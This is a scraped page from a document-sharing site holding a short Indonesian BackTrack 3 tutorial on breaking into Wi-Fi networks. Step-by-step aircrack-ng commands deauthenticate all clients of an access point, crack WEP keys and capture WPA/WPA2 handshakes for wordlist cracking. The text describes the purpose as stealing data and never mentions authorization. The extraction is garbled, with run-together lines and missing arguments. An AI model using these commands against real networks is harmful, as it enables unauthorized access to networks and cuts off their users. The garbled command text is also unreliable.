Backtrack Tutorial

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 4

a. Mematikan seluruh Client aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a [AP MAC] ath0 b.

WEP crack airmon-ng stop ath0 airmon-ng start wifi0 airodump-ng ath0 new console airodump-ng --channel
 

--bssid -w [hasil] ath0

new console aireplay-ng --arpreplay -b [AP MAC] -h [Client MAC] ath0 new console aireplay-ng --deauth 5 -c [Client MAC] -a [AP MAC] ath0 aircrack-ng hasil*.cap aircrack-ptw hasil-01.cap c. WPA/WPA2 Crack airmon-ng stop ath0 airmon-ng start wifi0 airodump-ng ath0 new console airodump-ng --channel
 

--bssid -w [hasil] ath0

new console aireplay-ng --deauth 2 -c [client MAC] -a [Ap MAC] ath0 new console aircrack-ng -w password.lst [hasil*cap]

List of compatible adapters BackTrack PCMCIA/Cardbus/Express Card Airlink AWLC4030 Chipset Atheros Belkin F5D8071 Chipset Atheros D-Link DWA-643 Chipset Atheros D-Link DWL-650 Chipset Prism 2.5 D-Link DWL-G630 C2 v3.01 Chipset Atheros D-Link DWL-G630 E1 Chipset Ralink D-Link DWL-G650 C3, C4, B5 Chipset Atheros Linksys WPC55AG v1.2 Chipset Atheros MSI CB54G2 Chipset Ralink Netgear WAG511 Chipset Atheros Netgear WG511T Chipset Atheros Netgear WG511U Chipset Atheros Proxim 8470-WD Chipset Atheros Senao NL-2511 CD PLUS EXT Chipset Prism 2.5 TP-Link TL-WN610G Chipset Atheros TrendNet TEW-441PC Ubiquiti SRC Chipset Atheros PCI/MiniPCI/MiniPCI Express ASUS WL-138G V2 Chipset Broadcom ASUS WL-138gE Chipset Broadcom Canyon CN-WF511 Chipset rt61 D-Link DWL-G550 Chipset Atheros Linksys WMP54G v4 Chipset Ralink Linksys WMP54G-UK v4.1 Chipset Ralink MSI PC54G2 Chipset Ralink Netgear WG311T Chipset Atheros Netgear WPN311 Chipset Atheros Thinkpad 11a/b/g Chipset Atheros TP-Link TL-WN650G Chipset Atheros TP-Link TL-WN651G Chipset Atheros Trendnet TEW-443PI A1 1R Chipset Atheros USB Asus WL-167g v2 Chipset Ralink RT73 Airlink AWLL3026 Chipset Zydas zd1211 Alfa AWUS036E Chipset RTL8187L Alfa AWUS036H Chipset rtl8187 Alfa AWUS036S Chipset Ralink rt73

Digitus DN-7003GS Chipset RTL8187L D-Link DWL-G122 B1 Chipset Ralink RT2570 D-Link DWL-G122 C1 Chipset Ralink RT73 D-Link WUA-1340 Chipset Ralink RT73 Edimax EW-7318USg Hawking HWUG1 Chipset Ralink rt73 Linksys WUSB54G v4 Chipset Ralink rt2570 Linksys WUSB54GC Chipset Ralink RT73 Netgear WG111 v1 Chipset PrismGT SoftMAC Netgear WG111 v2 Chipset RTL8187L TP-Link TL-WN321G Chipset Ralink RT73 Trendnet TEW-429UB C1 Chipset Zydas zd1211b ZyXEL AG-225H Chipset Zydas zd1211 ZyXEL G-202 Chipset Zydas zd1211b Banyak yang menyarankan sebaiknya menggunakan Chipset Atheros, BackTrack bakalan lebih jantan ..

Kenapa harus support Monitor dan Injection ? initinya wifi kita bisa mencuri data dan mengirimkan data gitu lho Booting laptop dengan menggunakan BackTrack 3 airmon-ng stop ath0 airmon-ng start wifi0 perintah di atas untuk mengaktifkan mode monitoring dan packet injection pada wireless adapter kita. ketik perintah : airodump-ng ath0 Perintah di atas akan menampilkan kondisi jaringan wireless pada area dimana kita berada. di layar akan tampil, MAC Address Access Point, BSSID, ESSID dan lain2x di sini kita harus tentukan BSSID mana yg akan di jadikan target setelah kita tentukan kita lihat juga client yg terkoneksi ke BSSID tersebut. Kita buka console baru ketik perintah

airodump-ng --channel 6 --bssid xx:xx:xx:xx:xx:xx -w hasil ath0 channel 6 didapatkan dari bssid target kita

BackTrack 3 Last Update: 19.06.2008 NOTE: Due to massive downloads and missing bandwidth, some servers might be unreachable and you need to hit either reload or click again on the download link. Description: CD Image Name:: bt3-final.iso Size: 695 MB MD5: f79cbfbcd25147df32f5f6dfa287c2d9 SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7 Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd Description: USB Version (Extended) Name:: bt3final_usb.iso Size: 784 MB MD5: 5d27c768e9c2fef61bbc208c78dadf22 SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb Description: VMware Image Name: BACKTRACK3_VMWare.rar Size: 689 MB MD5: 94212d3c24cf439644f158d90094ed6a SHA1: 21c9a3f9658133efff259adbe290723583b4fd82 Download: Click here http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm

You might also like